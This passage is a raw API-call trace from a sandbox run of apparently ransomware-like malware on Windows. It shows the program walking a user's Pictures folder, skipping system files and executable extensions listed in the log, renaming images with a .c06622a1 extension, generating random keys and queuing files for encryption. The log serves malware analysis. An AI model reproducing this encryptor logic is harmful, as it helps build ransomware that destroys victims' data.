(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png", dwFileAttributes=0x80) returned 1 [0155.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\xaezspi qgos.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x674 [0155.658] SetFilePointerEx (in: hFile=0x674, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.658] ReadFile (in: hFile=0x674, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0155.659] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x6f7a1071 [0155.659] RtlComputeCrc32 (PartialCrc=0x1071, Buffer=0x3fe674, Length=0x80) returned 0x962acaf6 [0155.659] RtlComputeCrc32 (PartialCrc=0xcaf6, Buffer=0x3fe674, Length=0x80) returned 0xa2a25750 [0155.659] RtlComputeCrc32 (PartialCrc=0x5750, Buffer=0x3fe674, Length=0x80) returned 0xfb15b7a9 [0155.659] RtlComputeCrc32 (PartialCrc=0xb7a9, Buffer=0x3fe674, Length=0x80) returned 0xb96e0c67 [0155.659] CloseHandle (hObject=0x674) returned 1 [0155.659] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.659] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png" [0155.659] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png") returned 0x4b [0155.659] wcscpy (in: _Dest=0x4540146, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.659] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\xaezspi qgos.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\xaezspi qgos.png.c06622a1"), dwFlags=0x8) returned 1 [0155.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\XAEzSPi qgos.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\xaezspi qgos.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x674 [0155.661] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.661] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0155.666] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78de6058 [0155.666] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4426c6fb [0155.666] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x398d9ef1 [0155.666] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5106c7e9 [0155.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1217f1f3 [0155.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ad595c6 [0155.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x37ede636 [0155.667] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b900308 [0155.670] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x3363075b [0155.670] RtlComputeCrc32 (PartialCrc=0x75b, Buffer=0x41f0094, Length=0x80) returned 0x67729e49 [0155.670] RtlComputeCrc32 (PartialCrc=0x9e49, Buffer=0x41f0094, Length=0x80) returned 0xda51d6cb [0155.670] RtlComputeCrc32 (PartialCrc=0xd6cb, Buffer=0x41f0094, Length=0x80) returned 0xa6f14887 [0155.670] RtlComputeCrc32 (PartialCrc=0x4887, Buffer=0x41f0094, Length=0x80) returned 0x6d61dbc1 [0155.670] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0155.670] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0155.670] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0155.670] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf64d5430, ftCreationTime.dwHighDateTime=0x1d5dd9b, ftLastAccessTime.dwLowDateTime=0x3f758a90, ftLastAccessTime.dwHighDateTime=0x1d5e334, ftLastWriteTime.dwLowDateTime=0x3f758a90, ftLastWriteTime.dwHighDateTime=0x1d5e334, nFileSizeHigh=0x0, nFileSizeLow=0x11b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hviJZyi.jpg", cAlternateFileName="")) returned 1 [0155.670] _wcsicmp (_Str1="_hviJZyi.jpg", _Str2="README.c06622a1.TXT") returned -19 [0155.670] wcsstr (_Str="_hviJZyi.jpg", _SubStr="README") returned 0x0 [0155.670] _wcsicmp (_Str1="autorun.inf", _Str2="_hviJZyi.jpg") returned 2 [0155.670] wcslen (_String="autorun.inf") returned 0xb [0155.670] _wcsicmp (_Str1="boot.ini", _Str2="_hviJZyi.jpg") returned 3 [0155.670] wcslen (_String="boot.ini") returned 0x8 [0155.670] _wcsicmp (_Str1="bootfont.bin", _Str2="_hviJZyi.jpg") returned 3 [0155.670] wcslen (_String="bootfont.bin") returned 0xc [0155.670] _wcsicmp (_Str1="bootsect.bak", _Str2="_hviJZyi.jpg") returned 3 [0155.670] wcslen (_String="bootsect.bak") returned 0xc [0155.670] _wcsicmp (_Str1="desktop.ini", _Str2="_hviJZyi.jpg") returned 5 [0155.670] wcslen (_String="desktop.ini") returned 0xb [0155.670] _wcsicmp (_Str1="iconcache.db", _Str2="_hviJZyi.jpg") returned 10 [0155.670] wcslen (_String="iconcache.db") returned 0xc [0155.670] _wcsicmp (_Str1="ntldr", _Str2="_hviJZyi.jpg") returned 15 [0155.670] wcslen (_String="ntldr") returned 0x5 [0155.670] _wcsicmp (_Str1="ntuser.dat", _Str2="_hviJZyi.jpg") returned 15 [0155.670] wcslen (_String="ntuser.dat") returned 0xa [0155.670] _wcsicmp (_Str1="ntuser.dat.log", _Str2="_hviJZyi.jpg") returned 15 [0155.670] wcslen (_String="ntuser.dat.log") returned 0xe [0155.670] _wcsicmp (_Str1="ntuser.ini", _Str2="_hviJZyi.jpg") returned 15 [0155.670] wcslen (_String="ntuser.ini") returned 0xa [0155.671] _wcsicmp (_Str1="thumbs.db", _Str2="_hviJZyi.jpg") returned 21 [0155.671] wcslen (_String="thumbs.db") returned 0x9 [0155.671] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0155.671] wcslen (_String="386") returned 0x3 [0155.671] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0155.671] wcslen (_String="adv") returned 0x3 [0155.671] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0155.671] wcslen (_String="ani") returned 0x3 [0155.671] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0155.671] wcslen (_String="bat") returned 0x3 [0155.671] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0155.671] wcslen (_String="bin") returned 0x3 [0155.671] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0155.671] wcslen (_String="cab") returned 0x3 [0155.671] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0155.671] wcslen (_String="cmd") returned 0x3 [0155.671] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0155.671] wcslen (_String="com") returned 0x3 [0155.671] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0155.671] wcslen (_String="cpl") returned 0x3 [0155.671] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0155.671] wcslen (_String="cur") returned 0x3 [0155.671] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0155.671] wcslen (_String="deskthemepack") returned 0xd [0155.671] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0155.671] wcslen (_String="diagcab") returned 0x7 [0155.671] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0155.671] wcslen (_String="diagcfg") returned 0x7 [0155.671] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0155.671] wcslen (_String="diagpkg") returned 0x7 [0155.671] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0155.671] wcslen (_String="dll") returned 0x3 [0155.671] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0155.671] wcslen (_String="drv") returned 0x3 [0155.671] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0155.671] wcslen (_String="exe") returned 0x3 [0155.672] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0155.672] wcslen (_String="hlp") returned 0x3 [0155.672] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0155.672] wcslen (_String="icl") returned 0x3 [0155.672] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0155.672] wcslen (_String="icns") returned 0x4 [0155.672] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0155.672] wcslen (_String="ico") returned 0x3 [0155.672] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0155.672] wcslen (_String="ics") returned 0x3 [0155.672] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0155.672] wcslen (_String="idx") returned 0x3 [0155.672] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0155.672] wcslen (_String="ldf") returned 0x3 [0155.672] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0155.672] wcslen (_String="lnk") returned 0x3 [0155.672] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0155.672] wcslen (_String="mod") returned 0x3 [0155.672] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0155.672] wcslen (_String="mpa") returned 0x3 [0155.672] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0155.672] wcslen (_String="msc") returned 0x3 [0155.672] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0155.672] wcslen (_String="msp") returned 0x3 [0155.672] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0155.672] wcslen (_String="msstyles") returned 0x8 [0155.672] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0155.672] wcslen (_String="msu") returned 0x3 [0155.672] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0155.672] wcslen (_String="nls") returned 0x3 [0155.672] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0155.672] wcslen (_String="nomedia") returned 0x7 [0155.672] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0155.672] wcslen (_String="ocx") returned 0x3 [0155.672] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0155.672] wcslen (_String="prf") returned 0x3 [0155.672] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0155.672] wcslen (_String="ps1") returned 0x3 [0155.673] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0155.673] wcslen (_String="rom") returned 0x3 [0155.673] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0155.673] wcslen (_String="rtp") returned 0x3 [0155.673] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0155.673] wcslen (_String="scr") returned 0x3 [0155.673] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0155.673] wcslen (_String="shs") returned 0x3 [0155.673] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0155.673] wcslen (_String="spl") returned 0x3 [0155.673] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0155.673] wcslen (_String="sys") returned 0x3 [0155.673] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0155.673] wcslen (_String="theme") returned 0x5 [0155.673] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0155.673] wcslen (_String="themepack") returned 0x9 [0155.673] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0155.673] wcslen (_String="wpx") returned 0x3 [0155.673] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0155.673] wcslen (_String="lock") returned 0x4 [0155.673] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0155.673] wcslen (_String="key") returned 0x3 [0155.673] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0155.673] wcslen (_String="hta") returned 0x3 [0155.673] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0155.673] wcslen (_String="msi") returned 0x3 [0155.673] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0155.673] wcslen (_String="pdb") returned 0x3 [0155.673] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0155.673] wcslen (_String="sql") returned 0x3 [0155.673] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0155.673] wcslen (_String="sqlite") returned 0x6 [0155.673] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy")) returned 0x10 [0155.674] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.674] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" [0155.674] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned 0x3a [0155.674] wcscpy (in: _Dest=0x453011e, _Source="_hviJZyi.jpg" | out: _Dest="_hviJZyi.jpg") returned="_hviJZyi.jpg" [0155.674] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg", dwFileAttributes=0x80) returned 1 [0155.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\_hvijzyi.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0155.674] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.674] ReadFile (in: hFile=0x670, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0155.675] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xb6cd903b [0155.675] RtlComputeCrc32 (PartialCrc=0x903b, Buffer=0x3fe674, Length=0x80) returned 0x956dfb59 [0155.675] RtlComputeCrc32 (PartialCrc=0xfb59, Buffer=0x3fe674, Length=0x80) returned 0xeb9709e0 [0155.675] RtlComputeCrc32 (PartialCrc=0x9e0, Buffer=0x3fe674, Length=0x80) returned 0x9cf0a239 [0155.675] RtlComputeCrc32 (PartialCrc=0xa239, Buffer=0x3fe674, Length=0x80) returned 0x9799362d [0155.675] CloseHandle (hObject=0x670) returned 1 [0155.675] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.675] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg" [0155.675] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg") returned 0x47 [0155.675] wcscpy (in: _Dest=0x454013e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.675] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\_hvijzyi.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\_hvijzyi.jpg.c06622a1"), dwFlags=0x8) returned 1 [0155.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\_hviJZyi.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\_hvijzyi.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0155.677] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.677] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7964e81b [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xbc86c80 [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ebe1f06 [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f3abb73 [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71535c7f [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36c72fd2 [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36744de7 [0155.683] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2e439e58 [0155.686] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xa5359c48 [0155.686] RtlComputeCrc32 (PartialCrc=0x9c48, Buffer=0x4280094, Length=0x80) returned 0x15ebe10 [0155.686] RtlComputeCrc32 (PartialCrc=0xbe10, Buffer=0x4280094, Length=0x80) returned 0xeb1c998b [0155.686] RtlComputeCrc32 (PartialCrc=0x998b, Buffer=0x4280094, Length=0x80) returned 0xad798ab2 [0155.686] RtlComputeCrc32 (PartialCrc=0x8ab2, Buffer=0x4280094, Length=0x80) returned 0xe5d9eaf5 [0155.686] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0155.686] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0155.686] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0155.686] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0155.686] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0155.687] _wcsicmp (_Str1="backup", _Str2="AX6_mnDSy") returned 1 [0155.687] wcslen (_String="backup") returned 0x6 [0155.687] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.687] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.687] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e271d0, ftCreationTime.dwHighDateTime=0x1d5dbc7, ftLastAccessTime.dwLowDateTime=0x4b199190, ftLastAccessTime.dwHighDateTime=0x1d5d9e6, ftLastWriteTime.dwLowDateTime=0x4b199190, ftLastWriteTime.dwHighDateTime=0x1d5d9e6, nFileSizeHigh=0x0, nFileSizeLow=0xedb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IIl7cZJVDTHmvn.jpg", cAlternateFileName="IIL7CZ~1.JPG")) returned 1 [0155.687] _wcsicmp (_Str1="IIl7cZJVDTHmvn.jpg", _Str2="README.c06622a1.TXT") returned -9 [0155.687] wcsstr (_Str="IIl7cZJVDTHmvn.jpg", _SubStr="README") returned 0x0 [0155.687] _wcsicmp (_Str1="autorun.inf", _Str2="IIl7cZJVDTHmvn.jpg") returned -8 [0155.687] wcslen (_String="autorun.inf") returned 0xb [0155.687] _wcsicmp (_Str1="boot.ini", _Str2="IIl7cZJVDTHmvn.jpg") returned -7 [0155.687] wcslen (_String="boot.ini") returned 0x8 [0155.687] _wcsicmp (_Str1="bootfont.bin", _Str2="IIl7cZJVDTHmvn.jpg") returned -7 [0155.687] wcslen (_String="bootfont.bin") returned 0xc [0155.687] _wcsicmp (_Str1="bootsect.bak", _Str2="IIl7cZJVDTHmvn.jpg") returned -7 [0155.687] wcslen (_String="bootsect.bak") returned 0xc [0155.687] _wcsicmp (_Str1="desktop.ini", _Str2="IIl7cZJVDTHmvn.jpg") returned -5 [0155.687] wcslen (_String="desktop.ini") returned 0xb [0155.687] _wcsicmp (_Str1="iconcache.db", _Str2="IIl7cZJVDTHmvn.jpg") returned -6 [0155.687] wcslen (_String="iconcache.db") returned 0xc [0155.687] _wcsicmp (_Str1="ntldr", _Str2="IIl7cZJVDTHmvn.jpg") returned 5 [0155.687] wcslen (_String="ntldr") returned 0x5 [0155.688] _wcsicmp (_Str1="ntuser.dat", _Str2="IIl7cZJVDTHmvn.jpg") returned 5 [0155.688] wcslen (_String="ntuser.dat") returned 0xa [0155.688] _wcsicmp (_Str1="ntuser.dat.log", _Str2="IIl7cZJVDTHmvn.jpg") returned 5 [0155.688] wcslen (_String="ntuser.dat.log") returned 0xe [0155.688] _wcsicmp (_Str1="ntuser.ini", _Str2="IIl7cZJVDTHmvn.jpg") returned 5 [0155.688] wcslen (_String="ntuser.ini") returned 0xa [0155.688] _wcsicmp (_Str1="thumbs.db", _Str2="IIl7cZJVDTHmvn.jpg") returned 11 [0155.688] wcslen (_String="thumbs.db") returned 0x9 [0155.688] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0155.688] wcslen (_String="386") returned 0x3 [0155.688] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0155.688] wcslen (_String="adv") returned 0x3 [0155.688] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0155.688] wcslen (_String="ani") returned 0x3 [0155.688] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0155.688] wcslen (_String="bat") returned 0x3 [0155.688] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0155.688] wcslen (_String="bin") returned 0x3 [0155.688] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0155.688] wcslen (_String="cab") returned 0x3 [0155.688] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0155.688] wcslen (_String="cmd") returned 0x3 [0155.688] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0155.688] wcslen (_String="com") returned 0x3 [0155.688] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0155.688] wcslen (_String="cpl") returned 0x3 [0155.688] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0155.688] wcslen (_String="cur") returned 0x3 [0155.688] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0155.688] wcslen (_String="deskthemepack") returned 0xd [0155.688] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0155.689] wcslen (_String="diagcab") returned 0x7 [0155.689] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0155.689] wcslen (_String="diagcfg") returned 0x7 [0155.689] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0155.689] wcslen (_String="diagpkg") returned 0x7 [0155.689] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0155.689] wcslen (_String="dll") returned 0x3 [0155.689] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0155.689] wcslen (_String="drv") returned 0x3 [0155.689] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0155.689] wcslen (_String="exe") returned 0x3 [0155.689] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0155.689] wcslen (_String="hlp") returned 0x3 [0155.689] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0155.689] wcslen (_String="icl") returned 0x3 [0155.689] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0155.689] wcslen (_String="icns") returned 0x4 [0155.689] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0155.689] wcslen (_String="ico") returned 0x3 [0155.689] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0155.689] wcslen (_String="ics") returned 0x3 [0155.689] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0155.689] wcslen (_String="idx") returned 0x3 [0155.689] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0155.689] wcslen (_String="ldf") returned 0x3 [0155.689] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0155.689] wcslen (_String="lnk") returned 0x3 [0155.689] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0155.689] wcslen (_String="mod") returned 0x3 [0155.689] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0155.689] wcslen (_String="mpa") returned 0x3 [0155.689] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0155.689] wcslen (_String="msc") returned 0x3 [0155.689] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0155.689] wcslen (_String="msp") returned 0x3 [0155.689] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0155.689] wcslen (_String="msstyles") returned 0x8 [0155.689] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0155.689] wcslen (_String="msu") returned 0x3 [0155.689] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0155.690] wcslen (_String="nls") returned 0x3 [0155.690] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0155.690] wcslen (_String="nomedia") returned 0x7 [0155.690] _wcsicmp (_Str1="ocx", 